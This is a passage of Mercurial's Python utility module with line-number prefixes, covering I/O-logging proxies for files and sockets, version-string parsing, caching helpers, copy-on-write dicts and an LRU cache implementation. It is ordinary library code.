612 612 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
613 613
614 614 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
615 615 bypass ``fileobjectproxy``. Because of this, we need to make
616 616 ``bufferedinputpipe`` aware of these operations.
617 617
618 618 This variation of ``bufferedinputpipe`` can notify observers about
619 619 ``os.read()`` events. It also re-publishes other events, such as
620 620 ``read()`` and ``readline()``.
621 621 """
622 622
623 623 def _fillbuffer(self):
624 624 res = super(observedbufferedinputpipe, self)._fillbuffer()
625 625
626 626 fn = getattr(self._input._observer, 'osread', None)
627 627 if fn:
628 628 fn(res, _chunksize)
629 629
630 630 return res
631 631
632 632 # We use different observer methods because the operation isn't
633 633 # performed on the actual file object but on us.
634 634 def read(self, size):
635 635 res = super(observedbufferedinputpipe, self).read(size)
636 636
637 637 fn = getattr(self._input._observer, 'bufferedread', None)
638 638 if fn:
639 639 fn(res, size)
640 640
641 641 return res
642 642
643 643 def readline(self, *args, **kwargs):
644 644 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
645 645
646 646 fn = getattr(self._input._observer, 'bufferedreadline', None)
647 647 if fn:
648 648 fn(res)
649 649
650 650 return res
651 651
652 652
653 653 PROXIED_SOCKET_METHODS = {
654 654 r'makefile',
655 655 r'recv',
656 656 r'recvfrom',
657 657 r'recvfrom_into',
658 658 r'recv_into',
659 659 r'send',
660 660 r'sendall',
661 661 r'sendto',
662 662 r'setblocking',
663 663 r'settimeout',
664 664 r'gettimeout',
665 665 r'setsockopt',
666 666 }
667 667
668 668
669 669 class socketproxy(object):
670 670 """A proxy around a socket that tells a watcher when events occur.
671 671
672 672 This is like ``fileobjectproxy`` except for sockets.
673 673
674 674 This type is intended to only be used for testing purposes. Think hard
675 675 before using it in important code.
676 676 """
677 677
678 678 __slots__ = (
679 679 r'_orig',
680 680 r'_observer',
681 681 )
682 682
683 683 def __init__(self, sock, observer):
684 684 object.__setattr__(self, r'_orig', sock)
685 685 object.__setattr__(self, r'_observer', observer)
686 686
687 687 def __getattribute__(self, name):
688 688 if name in PROXIED_SOCKET_METHODS:
689 689 return object.__getattribute__(self, name)
690 690
691 691 return getattr(object.__getattribute__(self, r'_orig'), name)
692 692
693 693 def __delattr__(self, name):
694 694 return delattr(object.__getattribute__(self, r'_orig'), name)
695 695
696 696 def __setattr__(self, name, value):
697 697 return setattr(object.__getattribute__(self, r'_orig'), name, value)
698 698
699 699 def __nonzero__(self):
700 700 return bool(object.__getattribute__(self, r'_orig'))
701 701
702 702 __bool__ = __nonzero__
703 703
704 704 def _observedcall(self, name, *args, **kwargs):
705 705 # Call the original object.
706 706 orig = object.__getattribute__(self, r'_orig')
707 707 res = getattr(orig, name)(*args, **kwargs)
708 708
709 709 # Call a method on the observer of the same name with arguments
710 710 # so it can react, log, etc.
711 711 observer = object.__getattribute__(self, r'_observer')
712 712 fn = getattr(observer, name, None)
713 713 if fn:
714 714 fn(res, *args, **kwargs)
715 715
716 716 return res
717 717
718 718 def makefile(self, *args, **kwargs):
719 719 res = object.__getattribute__(self, r'_observedcall')(
720 720 r'makefile', *args, **kwargs
721 721 )
722 722
723 723 # The file object may be used for I/O. So we turn it into a
724 724 # proxy using our observer.
725 725 observer = object.__getattribute__(self, r'_observer')
726 726 return makeloggingfileobject(
727 727 observer.fh,
728 728 res,
729 729 observer.name,
730 730 reads=observer.reads,
731 731 writes=observer.writes,
732 732 logdata=observer.logdata,
733 733 logdataapis=observer.logdataapis,
734 734 )
735 735
736 736 def recv(self, *args, **kwargs):
737 737 return object.__getattribute__(self, r'_observedcall')(
738 738 r'recv', *args, **kwargs
739 739 )
740 740
741 741 def recvfrom(self, *args, **kwargs):
742 742 return object.__getattribute__(self, r'_observedcall')(
743 743 r'recvfrom', *args, **kwargs
744 744 )
745 745
746 746 def recvfrom_into(self, *args, **kwargs):
747 747 return object.__getattribute__(self, r'_observedcall')(
748 748 r'recvfrom_into', *args, **kwargs
749 749 )
750 750
751 751 def recv_into(self, *args, **kwargs):
752 752 return object.__getattribute__(self, r'_observedcall')(
753 753 r'recv_into', *args, **kwargs
754 754 )
755 755
756 756 def send(self, *args, **kwargs):
757 757 return object.__getattribute__(self, r'_observedcall')(
758 758 r'send', *args, **kwargs
759 759 )
760 760
761 761 def sendall(self, *args, **kwargs):
762 762 return object.__getattribute__(self, r'_observedcall')(
763 763 r'sendall', *args, **kwargs
764 764 )
765 765
766 766 def sendto(self, *args, **kwargs):
767 767 return object.__getattribute__(self, r'_observedcall')(
768 768 r'sendto', *args, **kwargs
769 769 )
770 770
771 771 def setblocking(self, *args, **kwargs):
772 772 return object.__getattribute__(self, r'_observedcall')(
773 773 r'setblocking', *args, **kwargs
774 774 )
775 775
776 776 def settimeout(self, *args, **kwargs):
777 777 return object.__getattribute__(self, r'_observedcall')(
778 778 r'settimeout', *args, **kwargs
779 779 )
780 780
781 781 def gettimeout(self, *args, **kwargs):
782 782 return object.__getattribute__(self, r'_observedcall')(
783 783 r'gettimeout', *args, **kwargs
784 784 )
785 785
786 786 def setsockopt(self, *args, **kwargs):
787 787 return object.__getattribute__(self, r'_observedcall')(
788 788 r'setsockopt', *args, **kwargs
789 789 )
790 790
791 791
792 792 class baseproxyobserver(object):
793 793 def _writedata(self, data):
794 794 if not self.logdata:
795 795 if self.logdataapis:
796 796 self.fh.write(b'\n')
797 797 self.fh.flush()
798 798 return
799 799
800 800 # Simple case writes all data on a single line.
801 801 if b'\n' not in data:
802 802 if self.logdataapis:
803 803 self.fh.write(b': %s\n' % stringutil.escapestr(data))
804 804 else:
805 805 self.fh.write(
806 806 b'%s> %s\n' % (self.name, stringutil.escapestr(data))
807 807 )
808 808 self.fh.flush()
809 809 return
810 810
811 811 # Data with newlines is written to multiple lines.
812 812 if self.logdataapis:
813 813 self.fh.write(b':\n')
814 814
815 815 lines = data.splitlines(True)
816 816 for line in lines:
817 817 self.fh.write(
818 818 b'%s> %s\n' % (self.name, stringutil.escapestr(line))
819 819 )
820 820 self.fh.flush()
821 821
822 822
823 823 class fileobjectobserver(baseproxyobserver):
824 824 """Logs file object activity."""
825 825
826 826 def __init__(
827 827 self, fh, name, reads=True, writes=True, logdata=False, logdataapis=True
828 828 ):
829 829 self.fh = fh
830 830 self.name = name
831 831 self.logdata = logdata
832 832 self.logdataapis = logdataapis
833 833 self.reads = reads
834 834 self.writes = writes
835 835
836 836 def read(self, res, size=-1):
837 837 if not self.reads:
838 838 return
839 839 # Python 3 can return None from reads at EOF instead of empty strings.
840 840 if res is None:
841 841 res = b''
842 842
843 843 if size == -1 and res == b'':
844 844 # Suppress pointless read(-1) calls that return
845 845 # nothing. These happen _a lot_ on Python 3, and there
846 846 # doesn't seem to be a better workaround to have matching
847 847 # Python 2 and 3 behavior. :(
848 848 return
849 849
850 850 if self.logdataapis:
851 851 self.fh.write(b'%s> read(%d) -> %d' % (self.name, size, len(res)))
852 852
853 853 self._writedata(res)
854 854
855 855 def readline(self, res, limit=-1):
856 856 if not self.reads:
857 857 return
858 858
859 859 if self.logdataapis:
860 860 self.fh.write(b'%s> readline() -> %d' % (self.name, len(res)))
861 861
862 862 self._writedata(res)
863 863
864 864 def readinto(self, res, dest):
865 865 if not self.reads:
866 866 return
867 867
868 868 if self.logdataapis:
869 869 self.fh.write(
870 870 b'%s> readinto(%d) -> %r' % (self.name, len(dest), res)
871 871 )
872 872
873 873 data = dest[0:res] if res is not None else b''
874 874
875 875 # _writedata() uses "in" operator and is confused by memoryview because
876 876 # characters are ints on Python 3.
877 877 if isinstance(data, memoryview):
878 878 data = data.tobytes()
879 879
880 880 self._writedata(data)
881 881
882 882 def write(self, res, data):
883 883 if not self.writes:
884 884 return
885 885
886 886 # Python 2 returns None from some write() calls. Python 3 (reasonably)
887 887 # returns the number of bytes written.
888 888 if res is None and data:
889 889 res = len(data)
890 890
891 891 if self.logdataapis:
892 892 self.fh.write(b'%s> write(%d) -> %r' % (self.name, len(data), res))
893 893
894 894 self._writedata(data)
895 895
896 896 def flush(self, res):
897 897 if not self.writes:
898 898 return
899 899
900 900 self.fh.write(b'%s> flush() -> %r\n' % (self.name, res))
901 901
902 902 # For observedbufferedinputpipe.
903 903 def bufferedread(self, res, size):
904 904 if not self.reads:
905 905 return
906 906
907 907 if self.logdataapis:
908 908 self.fh.write(
909 909 b'%s> bufferedread(%d) -> %d' % (self.name, size, len(res))
910 910 )
911 911
912 912 self._writedata(res)
913 913
914 914 def bufferedreadline(self, res):
915 915 if not self.reads:
916 916 return
917 917
918 918 if self.logdataapis:
919 919 self.fh.write(
920 920 b'%s> bufferedreadline() -> %d' % (self.name, len(res))
921 921 )
922 922
923 923 self._writedata(res)
924 924
925 925
926 926 def makeloggingfileobject(
927 927 logh, fh, name, reads=True, writes=True, logdata=False, logdataapis=True
928 928 ):
929 929 """Turn a file object into a logging file object."""
930 930
931 931 observer = fileobjectobserver(
932 932 logh,
933 933 name,
934 934 reads=reads,
935 935 writes=writes,
936 936 logdata=logdata,
937 937 logdataapis=logdataapis,
938 938 )
939 939 return fileobjectproxy(fh, observer)
940 940
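A usage sketch for makeloggingfileobject, logging reads from an in-memory source (names are illustrative):

    import io

    logh = io.BytesIO()
    fh = makeloggingfileobject(logh, io.BytesIO(b'abc'), b'src', logdata=True)
    fh.read(2)
    print(logh.getvalue())  # b'src> read(2) -> 2: ab\n'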
941 941
942 942 class socketobserver(baseproxyobserver):
943 943 """Logs socket activity."""
944 944
945 945 def __init__(
946 946 self,
947 947 fh,
948 948 name,
949 949 reads=True,
950 950 writes=True,
951 951 states=True,
952 952 logdata=False,
953 953 logdataapis=True,
954 954 ):
955 955 self.fh = fh
956 956 self.name = name
957 957 self.reads = reads
958 958 self.writes = writes
959 959 self.states = states
960 960 self.logdata = logdata
961 961 self.logdataapis = logdataapis
962 962
963 963 def makefile(self, res, mode=None, bufsize=None):
964 964 if not self.states:
965 965 return
966 966
967 967 self.fh.write(b'%s> makefile(%r, %r)\n' % (self.name, mode, bufsize))
968 968
969 969 def recv(self, res, size, flags=0):
970 970 if not self.reads:
971 971 return
972 972
973 973 if self.logdataapis:
974 974 self.fh.write(
975 975 b'%s> recv(%d, %d) -> %d' % (self.name, size, flags, len(res))
976 976 )
977 977 self._writedata(res)
978 978
979 979 def recvfrom(self, res, size, flags=0):
980 980 if not self.reads:
981 981 return
982 982
983 983 if self.logdataapis:
984 984 self.fh.write(
985 985 b'%s> recvfrom(%d, %d) -> %d'
986 986 % (self.name, size, flags, len(res[0]))
987 987 )
988 988
989 989 self._writedata(res[0])
990 990
991 991 def recvfrom_into(self, res, buf, size, flags=0):
992 992 if not self.reads:
993 993 return
994 994
995 995 if self.logdataapis:
996 996 self.fh.write(
997 997 b'%s> recvfrom_into(%d, %d) -> %d'
998 998 % (self.name, size, flags, res[0])
999 999 )
1000 1000
1001 1001 self._writedata(buf[0 : res[0]])
1002 1002
1003 1003 def recv_into(self, res, buf, size=0, flags=0):
1004 1004 if not self.reads:
1005 1005 return
1006 1006
1007 1007 if self.logdataapis:
1008 1008 self.fh.write(
1009 1009 b'%s> recv_into(%d, %d) -> %d' % (self.name, size, flags, res)
1010 1010 )
1011 1011
1012 1012 self._writedata(buf[0:res])
1013 1013
1014 1014 def send(self, res, data, flags=0):
1015 1015 if not self.writes:
1016 1016 return
1017 1017
1018 1018 self.fh.write(
1019 1019 b'%s> send(%d, %d) -> %d' % (self.name, len(data), flags, len(res))
1020 1020 )
1021 1021 self._writedata(data)
1022 1022
1023 1023 def sendall(self, res, data, flags=0):
1024 1024 if not self.writes:
1025 1025 return
1026 1026
1027 1027 if self.logdataapis:
1028 1028 # Returns None on success. So don't bother reporting return value.
1029 1029 self.fh.write(
1030 1030 b'%s> sendall(%d, %d)' % (self.name, len(data), flags)
1031 1031 )
1032 1032
1033 1033 self._writedata(data)
1034 1034
1035 1035 def sendto(self, res, data, flagsoraddress, address=None):
1036 1036 if not self.writes:
1037 1037 return
1038 1038
1039 1039 if address:
1040 1040 flags = flagsoraddress
1041 1041 else:
1042 1042 flags = 0
1043 1043
1044 1044 if self.logdataapis:
1045 1045 self.fh.write(
1046 1046 b'%s> sendto(%d, %d, %r) -> %d'
1047 1047 % (self.name, len(data), flags, address, res)
1048 1048 )
1049 1049
1050 1050 self._writedata(data)
1051 1051
1052 1052 def setblocking(self, res, flag):
1053 1053 if not self.states:
1054 1054 return
1055 1055
1056 1056 self.fh.write(b'%s> setblocking(%r)\n' % (self.name, flag))
1057 1057
1058 1058 def settimeout(self, res, value):
1059 1059 if not self.states:
1060 1060 return
1061 1061
1062 1062 self.fh.write(b'%s> settimeout(%r)\n' % (self.name, value))
1063 1063
1064 1064 def gettimeout(self, res):
1065 1065 if not self.states:
1066 1066 return
1067 1067
1068 1068 self.fh.write(b'%s> gettimeout() -> %f\n' % (self.name, res))
1069 1069
1070 1070 def setsockopt(self, res, level, optname, value):
1071 1071 if not self.states:
1072 1072 return
1073 1073
1074 1074 self.fh.write(
1075 1075 b'%s> setsockopt(%r, %r, %r) -> %r\n'
1076 1076 % (self.name, level, optname, value, res)
1077 1077 )
1078 1078
1079 1079
1080 1080 def makeloggingsocket(
1081 1081 logh,
1082 1082 fh,
1083 1083 name,
1084 1084 reads=True,
1085 1085 writes=True,
1086 1086 states=True,
1087 1087 logdata=False,
1088 1088 logdataapis=True,
1089 1089 ):
1090 1090 """Turn a socket into a logging socket."""
1091 1091
1092 1092 observer = socketobserver(
1093 1093 logh,
1094 1094 name,
1095 1095 reads=reads,
1096 1096 writes=writes,
1097 1097 states=states,
1098 1098 logdata=logdata,
1099 1099 logdataapis=logdataapis,
1100 1100 )
1101 1101 return socketproxy(fh, observer)
1102 1102
1103 1103
1104 1104 def version():
1105 1105 """Return version information if available."""
1106 1106 try:
1107 1107 from . import __version__
1108 1108
1109 1109 return __version__.version
1110 1110 except ImportError:
1111 1111 return b'unknown'
1112 1112
1113 1113
1114 1114 def versiontuple(v=None, n=4):
1115 1115 """Parses a Mercurial version string into an N-tuple.
1116 1116
1117 1117 The version string to be parsed is specified with the ``v`` argument.
1118 1118 If it isn't defined, the current Mercurial version string will be parsed.
1119 1119
1120 1120 ``n`` can be 2, 3, or 4. Here is how some version strings map to
1121 1121 returned values:
1122 1122
1123 1123 >>> v = b'3.6.1+190-df9b73d2d444'
1124 1124 >>> versiontuple(v, 2)
1125 1125 (3, 6)
1126 1126 >>> versiontuple(v, 3)
1127 1127 (3, 6, 1)
1128 1128 >>> versiontuple(v, 4)
1129 1129 (3, 6, 1, '190-df9b73d2d444')
1130 1130
1131 1131 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
1132 1132 (3, 6, 1, '190-df9b73d2d444+20151118')
1133 1133
1134 1134 >>> v = b'3.6'
1135 1135 >>> versiontuple(v, 2)
1136 1136 (3, 6)
1137 1137 >>> versiontuple(v, 3)
1138 1138 (3, 6, None)
1139 1139 >>> versiontuple(v, 4)
1140 1140 (3, 6, None, None)
1141 1141
1142 1142 >>> v = b'3.9-rc'
1143 1143 >>> versiontuple(v, 2)
1144 1144 (3, 9)
1145 1145 >>> versiontuple(v, 3)
1146 1146 (3, 9, None)
1147 1147 >>> versiontuple(v, 4)
1148 1148 (3, 9, None, 'rc')
1149 1149
1150 1150 >>> v = b'3.9-rc+2-02a8fea4289b'
1151 1151 >>> versiontuple(v, 2)
1152 1152 (3, 9)
1153 1153 >>> versiontuple(v, 3)
1154 1154 (3, 9, None)
1155 1155 >>> versiontuple(v, 4)
1156 1156 (3, 9, None, 'rc+2-02a8fea4289b')
1157 1157
1158 1158 >>> versiontuple(b'4.6rc0')
1159 1159 (4, 6, None, 'rc0')
1160 1160 >>> versiontuple(b'4.6rc0+12-425d55e54f98')
1161 1161 (4, 6, None, 'rc0+12-425d55e54f98')
1162 1162 >>> versiontuple(b'.1.2.3')
1163 1163 (None, None, None, '.1.2.3')
1164 1164 >>> versiontuple(b'12.34..5')
1165 1165 (12, 34, None, '..5')
1166 1166 >>> versiontuple(b'1.2.3.4.5.6')
1167 1167 (1, 2, 3, '.4.5.6')
1168 1168 """
1169 1169 if not v:
1170 1170 v = version()
1171 1171 m = remod.match(br'(\d+(?:\.\d+){,2})[\+-]?(.*)', v)
1172 1172 if not m:
1173 1173 vparts, extra = b'', v
1174 1174 elif m.group(2):
1175 1175 vparts, extra = m.groups()
1176 1176 else:
1177 1177 vparts, extra = m.group(1), None
1178 1178
1179 1179 vints = []
1180 1180 for i in vparts.split(b'.'):
1181 1181 try:
1182 1182 vints.append(int(i))
1183 1183 except ValueError:
1184 1184 break
1185 1185 # (3, 6) -> (3, 6, None)
1186 1186 while len(vints) < 3:
1187 1187 vints.append(None)
1188 1188
1189 1189 if n == 2:
1190 1190 return (vints[0], vints[1])
1191 1191 if n == 3:
1192 1192 return (vints[0], vints[1], vints[2])
1193 1193 if n == 4:
1194 1194 return (vints[0], vints[1], vints[2], extra)
1195 1195
1196 1196
1197 1197 def cachefunc(func):
1198 1198 '''cache the result of function calls'''
1199 1199 # XXX doesn't handle keyword args
1200 1200 if func.__code__.co_argcount == 0:
1201 1201 cache = []
1202 1202
1203 1203 def f():
1204 1204 if len(cache) == 0:
1205 1205 cache.append(func())
1206 1206 return cache[0]
1207 1207
1208 1208 return f
1209 1209 cache = {}
1210 1210 if func.__code__.co_argcount == 1:
1211 1211 # we gain a small amount of time because
1212 1212 # we don't need to pack/unpack the list
1213 1213 def f(arg):
1214 1214 if arg not in cache:
1215 1215 cache[arg] = func(arg)
1216 1216 return cache[arg]
1217 1217
1218 1218 else:
1219 1219
1220 1220 def f(*args):
1221 1221 if args not in cache:
1222 1222 cache[args] = func(*args)
1223 1223 return cache[args]
1224 1224
1225 1225 return f
1226 1226
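cachefunc also works as a decorator; a small sketch (keyword arguments are not handled, as the XXX above notes):

    @cachefunc
    def fib(n):
        return n if n < 2 else fib(n - 1) + fib(n - 2)

    fib(30)  # each distinct n is computed once, then served from the cache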
1227 1227
1228 1228 class cow(object):
1229 1229 """helper class to make copy-on-write easier
1230 1230
1231 1231 Call preparewrite before doing any writes.
1232 1232 """
1233 1233
1234 1234 def preparewrite(self):
1235 1235 """call this before writes, return self or a copied new object"""
1236 1236 if getattr(self, '_copied', 0):
1237 1237 self._copied -= 1
1238 1238 return self.__class__(self)
1239 1239 return self
1240 1240
1241 1241 def copy(self):
1242 1242 """always do a cheap copy"""
1243 1243 self._copied = getattr(self, '_copied', 0) + 1
1244 1244 return self
1245 1245
1246 1246
1247 1247 class sortdict(collections.OrderedDict):
1248 1248 '''a simple sorted dictionary
1249 1249
1250 1250 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1251 1251 >>> d2 = d1.copy()
1252 1252 >>> d2
1253 1253 sortdict([('a', 0), ('b', 1)])
1254 1254 >>> d2.update([(b'a', 2)])
1255 1255 >>> list(d2.keys()) # should still be in last-set order
1256 1256 ['b', 'a']
1257 1257 '''
1258 1258
1259 1259 def __setitem__(self, key, value):
1260 1260 if key in self:
1261 1261 del self[key]
1262 1262 super(sortdict, self).__setitem__(key, value)
1263 1263
1264 1264 if pycompat.ispypy:
1265 1265 # __setitem__() isn't called as of PyPy 5.8.0
1266 1266 def update(self, src):
1267 1267 if isinstance(src, dict):
1268 1268 src = pycompat.iteritems(src)
1269 1269 for k, v in src:
1270 1270 self[k] = v
1271 1271
1272 1272
1273 1273 class cowdict(cow, dict):
1274 1274 """copy-on-write dict
1275 1275
1276 1276 Be sure to call d = d.preparewrite() before writing to d.
1277 1277
1278 1278 >>> a = cowdict()
1279 1279 >>> a is a.preparewrite()
1280 1280 True
1281 1281 >>> b = a.copy()
1282 1282 >>> b is a
1283 1283 True
1284 1284 >>> c = b.copy()
1285 1285 >>> c is a
1286 1286 True
1287 1287 >>> a = a.preparewrite()
1288 1288 >>> b is a
1289 1289 False
1290 1290 >>> a is a.preparewrite()
1291 1291 True
1292 1292 >>> c = c.preparewrite()
1293 1293 >>> b is c
1294 1294 False
1295 1295 >>> b is b.preparewrite()
1296 1296 True
1297 1297 """
1298 1298
1299 1299
1300 1300 class cowsortdict(cow, sortdict):
1301 1301 """copy-on-write sortdict
1302 1302
1303 1303 Be sure to call d = d.preparewrite() before writing to d.
1304 1304 """
1305 1305
1306 1306
1307 1307 class transactional(object): # pytype: disable=ignored-metaclass
1308 1308 """Base class for making a transactional type into a context manager."""
1309 1309
1310 1310 __metaclass__ = abc.ABCMeta
1311 1311
1312 1312 @abc.abstractmethod
1313 1313 def close(self):
1314 1314 """Successfully closes the transaction."""
1315 1315
1316 1316 @abc.abstractmethod
1317 1317 def release(self):
1318 1318 """Marks the end of the transaction.
1319 1319
1320 1320 If the transaction has not been closed, it will be aborted.
1321 1321 """
1322 1322
1323 1323 def __enter__(self):
1324 1324 return self
1325 1325
1326 1326 def __exit__(self, exc_type, exc_val, exc_tb):
1327 1327 try:
1328 1328 if exc_type is None:
1329 1329 self.close()
1330 1330 finally:
1331 1331 self.release()
1332 1332
1333 1333
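A minimal concrete subclass, purely illustrative, showing the close-on-success / release-always contract:

    class demotransaction(transactional):
        def __init__(self):
            self.closed = False

        def close(self):
            self.closed = True

        def release(self):
            if not self.closed:
                print('rolling back')

    with demotransaction():
        pass  # close() runs because no exception escaped; release() always runs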
1334 1334 @contextlib.contextmanager
1335 1335 def acceptintervention(tr=None):
1336 1336 """A context manager that closes the transaction on InterventionRequired
1337 1337
1338 1338 If no transaction was provided, this simply runs the body and returns
1339 1339 """
1340 1340 if not tr:
1341 1341 yield
1342 1342 return
1343 1343 try:
1344 1344 yield
1345 1345 tr.close()
1346 1346 except error.InterventionRequired:
1347 1347 tr.close()
1348 1348 raise
1349 1349 finally:
1350 1350 tr.release()
1351 1351
1352 1352
1353 1353 @contextlib.contextmanager
1354 1354 def nullcontextmanager():
1355 1355 yield
1356 1356
1357 1357
1358 1358 class _lrucachenode(object):
1359 1359 """A node in a doubly linked list.
1360 1360
1361 1361 Holds a reference to nodes on either side as well as a key-value
1362 1362 pair for the dictionary entry.
1363 1363 """
1364 1364
1365 1365 __slots__ = (r'next', r'prev', r'key', r'value', r'cost')
1366 1366
1367 1367 def __init__(self):
1368 1368 self.next = None
1369 1369 self.prev = None
1370 1370
1371 1371 self.key = _notset
1372 1372 self.value = None
1373 1373 self.cost = 0
1374 1374
1375 1375 def markempty(self):
1376 1376 """Mark the node as emptied."""
1377 1377 self.key = _notset
1378 1378 self.value = None
1379 1379 self.cost = 0
1380 1380
1381 1381
1382 1382 class lrucachedict(object):
1383 1383 """Dict that caches most recent accesses and sets.
1384 1384
1385 1385 The dict consists of an actual backing dict - indexed by original
1386 1386 key - and a doubly linked circular list defining the order of entries in
1387 1387 the cache.
1388 1388
1389 1389 The head node is the newest entry in the cache. If the cache is full,
1390 1390 we recycle head.prev and make it the new head. Cache accesses result in
1391 1391 the node being moved to before the existing head and being marked as the
1392 1392 new head node.
1393 1393
1394 1394 Items in the cache can be inserted with an optional "cost" value. This is
1395 1395 simply an integer that is specified by the caller. The cache can be queried
1396 1396 for the total cost of all items presently in the cache.
1397 1397
1398 1398 The cache can also define a maximum cost. If a cache insertion would
1399 1399 cause the total cost of the cache to go beyond the maximum cost limit,
1400 1400 nodes will be evicted to make room for the new node. This can be used
1401 1401 to e.g. set a max memory limit and associate an estimated bytes size
1402 1402 cost to each item in the cache. By default, no maximum cost is enforced.
1403 1403 """
1404 1404
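Before the implementation, a usage sketch of the cost-limited behaviour described above (the numbers are illustrative):

    d = lrucachedict(4, maxcost=100)
    d.insert(b'a', 'value-a', cost=60)
    d.insert(b'b', 'value-b', cost=60)  # total cost 120 > 100: b'a' is evicted
    assert b'a' not in d and b'b' in d
    d[b'c'] = 'value-c'                 # __setitem__ is insert() with cost=0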
1405 1405 def __init__(self, max, maxcost=0):
1406 1406 self._cache = {}
1407 1407
1408 1408 self._head = head = _lrucachenode()
1409 1409 head.prev = head
1410 1410 head.next = head
1411 1411 self._size = 1
1412 1412 self.capacity = max
1413 1413 self.totalcost = 0
1414 1414 self.maxcost = maxcost
1415 1415
1416 1416 def __len__(self):
1417 1417 return len(self._cache)
1418 1418
1419 1419 def __contains__(self, k):
1420 1420 return k in self._cache
1421 1421
1422 1422 def __iter__(self):
1423 1423 # We don't have to iterate in cache order, but why not.
1424 1424 n = self._head
1425 1425 for i in range(len(self._cache)):
1426 1426 yield n.key
1427 1427 n = n.next
1428 1428
1429 1429 def __getitem__(self, k):
1430 1430 node = self._cache[k]
1431 1431 self._movetohead(node)
1432 1432 return node.value
1433 1433
1434 1434 def insert(self, k, v, cost=0):
1435 1435 """Insert a new item in the cache with optional cost value."""
1436 1436 node = self._cache.get(k)
1437 1437 # Replace existing value and mark as newest.
1438 1438 if node is not None:
1439 1439 self.totalcost -= node.cost
1440 1440 node.value = v
1441 1441 node.cost = cost
1442 1442 self.totalcost += cost
1443 1443 self._movetohead(node)
1444 1444
1445 1445 if self.maxcost:
1446 1446 self._enforcecostlimit()
1447 1447
1448 1448 return
1449 1449
1450 1450 if self._size < self.capacity:
1451 1451 node = self._addcapacity()
1452 1452 else:
1453 1453 # Grab the last/oldest item.
1454 1454 node = self._head.prev
1455 1455
1456 1456 # At capacity. Kill the old entry.
1457 1457 if node.key is not _notset:
1458 1458 self.totalcost -= node.cost
1459 1459 del self._cache[node.key]
1460 1460
1461 1461 node.key = k
1462 1462 node.value = v
1463 1463 node.cost = cost
1464 1464 self.totalcost += cost
1465 1465 self._cache[k] = node
1466 1466 # And mark it as newest entry. No need to adjust order since it
1467 1467 # is already self._head.prev.
1468 1468 self._head = node
1469 1469
1470 1470 if self.maxcost:
1471 1471 self._enforcecostlimit()
1472 1472
1473 1473 def __setitem__(self, k, v):
1474 1474 self.insert(k, v)
1475 1475
1476 1476 def __delitem__(self, k):
1477 1477 self.pop(k)
1478 1478
1479 1479 def pop(self, k, default=_notset):
1480 1480 try:
1481 1481 node = self._cache.pop(k)
1482 1482 except KeyError:
1483 1483 if default is _notset:
1484 1484 raise
1485 1485 return default
1486 1486 value = node.value
1487 1487 self.totalcost -= node.cost
1488 1488 node.markempty()
1489 1489
1490 1490 # Temporarily mark as newest item before re-adjusting head to make
1491 1491 # this node the oldest item.
1492 1492 self._movetohead(node)
1493 1493 self._head = node.next
1494 1494
1495 1495 return value
1496 1496
1497 1497 # Additional dict methods.
1498 1498
1499 1499 def get(self, k, default=None):
1500 1500 try:
1501 1501 return self.__getitem__(k)
1502 1502 except KeyError:
1503 1503 return default
1504 1504
1505 1505 def peek(self, k, default=_notset):
1506 1506 """Get the specified item without moving it to the head
1507 1507
1508 1508 Unlike get(), this doesn't mutate the internal state. But be aware
1509 1509 that this doesn't mean peek() is thread safe.
1510 1510 """
1511 1511 try:
1512 1512 node = self._cache[k]
1513 1513 return node.value
1514 1514 except KeyError:
1515 1515 if default is _notset:
1516 1516 raise
1517 1517 return default
1518 1518
1519 1519 def clear(self):
1520 1520 n = self._head
1521 1521 while n.key is not _notset:
1522 1522 self.totalcost -= n.cost
1523 1523 n.markempty()
1524 1524 n = n.next
1525 1525
1526 1526 self._cache.clear()
1527 1527
1528 1528 def copy(self, capacity=None, maxcost=0):
1529 1529 """Create a new cache as a copy of the current one.
1530 1530
1531 1531 By default, the new cache has the same capacity as the existing one.
1532 1532 But, the cache capacity can be changed as part of performing the
1533 1533 copy.
1534 1534
1535 1535 Items in the copy have an insertion/access order matching this
1536 1536 instance.
1537 1537 """
1538 1538
1539 1539 capacity = capacity or self.capacity
1540 1540 maxcost = maxcost or self.maxcost
1541 1541 result = lrucachedict(capacity, maxcost=maxcost)
1542 1542
1543 1543 # We copy entries by iterating in oldest-to-newest order so the copy
1544 1544 # has the correct ordering.
1545 1545
1546 1546 # Find the first non-empty entry.
1547 1547 n = self._head.prev
1548 1548 while n.key is _notset and n is not self._head:
1549 1549 n = n.prev
1550 1550
1551 1551 # We could potentially skip the first N items when decreasing capacity.
1552 1552 # But let's keep it simple unless it is a performance problem.
1553 1553 for i in range(len(self._cache)):
1554 1554 result.insert(n.key, n.value, cost=n.cost)
1555 1555 n = n.prev
1556 1556
1557 1557 return result
1558 1558
1559 1559 def popoldest(self):
1560 1560 """Remove the oldest item from the cache.
1561 1561
1562 1562         Returns the (key, value) of the removed cache entry, or None if empty.
1563 1563 """
1564 1564 if not self._cache:
1565 1565 return
1566 1566
1567 1567 # Walk the linked list backwards starting at tail node until we hit
1568 1568 # a non-empty node.
1569 1569 n = self._head.prev
1570 1570 while n.key is _notset:
1571 1571 n = n.prev
1572 1572
1573 1573 key, value = n.key, n.value
1574 1574
1575 1575 # And remove it from the cache and mark it as empty.
1576 1576 del self._cache[n.key]
1577 1577 self.totalcost -= n.cost
1578 1578 n.markempty()
1579 1579
1580 1580 return key, value
1581 1581
1582 1582 def _movetohead(self, node):
1583 1583 """Mark a node as the newest, making it the new head.
1584 1584
1585 1585 When a node is accessed, it becomes the freshest entry in the LRU
1586 1586 list, which is denoted by self._head.
1587 1587
1588 1588 Visually, let's make ``N`` the new head node (* denotes head):
1589 1589
1590 1590 previous/oldest <-> head <-> next/next newest
1591 1591
1592 1592 ----<->--- A* ---<->-----
1593 1593 | |
1594 1594 E <-> D <-> N <-> C <-> B
1595 1595
1596 1596 To:
1597 1597
1598 1598 ----<->--- N* ---<->-----
1599 1599 | |
1600 1600 E <-> D <-> C <-> B <-> A
1601 1601
1602 1602 This requires the following moves:
1603 1603
1604 1604 C.next = D (node.prev.next = node.next)
1605 1605 D.prev = C (node.next.prev = node.prev)
1606 1606 E.next = N (head.prev.next = node)
1607 1607 N.prev = E (node.prev = head.prev)
1608 1608 N.next = A (node.next = head)
1609 1609 A.prev = N (head.prev = node)
1610 1610 """
1611 1611 head = self._head
1612 1612 # C.next = D
